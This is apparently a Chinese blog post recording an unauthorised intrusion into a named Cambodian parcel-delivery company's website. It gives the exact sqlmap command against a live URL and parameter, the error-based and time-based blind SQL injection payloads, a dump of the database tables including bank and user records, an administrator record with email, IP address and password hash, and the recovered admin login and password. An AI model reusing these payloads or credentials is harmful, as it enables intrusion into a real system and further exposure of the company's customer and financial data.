对柬埔寨申通的实战渗透
Published in:2022-03-31 | category: 渗透测试 
1
sqlmap -u "http://www.stocambodia.com/search.php?act=detail&bglxid=972%E9%8E%88%27%22%5C%28&cc=4111111111111111%2C&city=&country=NSW%E6%96%B0%E5%8D%97%E5%A8%81%E5%B0%94%E5%A3%AB%E5%B7%9E&czcc=1&gg=1%2C&js=1%2C&kk=1%2C&weight=1%2C&youbian=" -p bglxid -D shentong --tables --batch

截屏2022-03-31 21.55.20

渗透测试第一部:数据暴库

1
2
3
4
5
6
7
8
9
10
---
Parameter: bglxid (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: act=detail&bglxid=-7745 OR 1 GROUP BY CONCAT(0x716a707671,(SELECT (CASE WHEN (4657=4657) THEN 1 ELSE 0 END)),0x71626a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&cc=4111111111111111,&city=&country=NSW%E6%96%B0%E5%8D%97%E5%A8%81%E5%B0%94%E5%A3%AB%E5%B7%9E&czcc=1&gg=1,&js=1,&kk=1,&weight=1,&youbian=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: act=detail&bglxid=(SELECT 7733 FROM (SELECT(SLEEP(5)))tfTu)&cc=4111111111111111,&city=&country=NSW%E6%96%B0%E5%8D%97%E5%A8%81%E5%B0%94%E5%A3%AB%E5%B7%9E&czcc=1&gg=1,&js=1,&kk=1,&weight=1,&youbian=
---

记录数据多的数据库:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Database: shentong
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| ecs_stats              | 354977  |
| ecs_admin_log          | 273014  |
| ecs_zzfw_list          | 186535  |
| ecs_route              | 87329   |
| ecs_pianyuan_xq        | 85356   |
| ecs_order_income       | 37977   |
| ecs_order_outcome      | 31605   |
| ecs_bank_info          | 28552   |
| ecs_sessions_data      | 17238   |
| ecs_jifen_log_copy1    | 15496   |
| ecs_keywords           | 8361    |
| ecs_jifen_user_copy1   | 5374    |
| ecs_jifen_user_copy    | 4882    |
| ecs_wx_message         | 3814    |
| ecs_cz_info            | 3612    |
| ecs_region             | 3408    |
| ecs_qywx_djr           | 3051    |
| ecs_bank_zxcb          | 2798    |
| ecs_users              | 2440    |
| ecs_paisong_czsm       | 1713    |
| ecs_pay_log            | 1561    |
| ecs_area_copy          | 1397    |
| ecs_area               | 1326    |
| ecs_jiali              | 861     |
| ecs_searchengine       | 832     |
| ecs_huojia             | 750     |
| ecs_user_address       | 553     |
| ecs_reg_extend_info    | 442     |
| ecs_post_num_jl        | 394     |
| ecs_order_action       | 336     |
| ecs_vip_bglx           | 335     |
| ecs_types              | 301     |
| ecs_admin_action       | 286     |
| ecs_order_zhichu       | 252     |
| ecs_shop_config        | 239     |
| ecs_goods_gallery      | 217     |
| ecs_account_log        | 213     |
| ecs_shop_config_wap    | 191     |
| ecs_ad                 | 157     |
| ecs_price_gbj          | 135     |
| ecs_fencheng_jilu_copy | 124     |
| ecs_fq_copy            | 115     |
| ecs_fq                 | 100

后台攻破:

后台数据表:ecs_admin_user 

1
2
3
admin1,<blank>,<blank>,1259,525999955@qq.com,0,0,<blank>,2331,96.9.88.251,1634947229,<blank>,331b05b18d04030e9b900c00553d497a,NULL,<blank>,<blank>,0,admin1,1635709960,"

admin1  sto123

截屏2022-03-31 21.58.56

实战渗透 SQL注入
Prev:
对ftftx的渗透测试
Next:
网络空间搜索引擎
catalog
catalog
    •

    中国-国家安全局 © 2021 - 2022 腾蛇TG频道 | 回忆

    Total visits: times |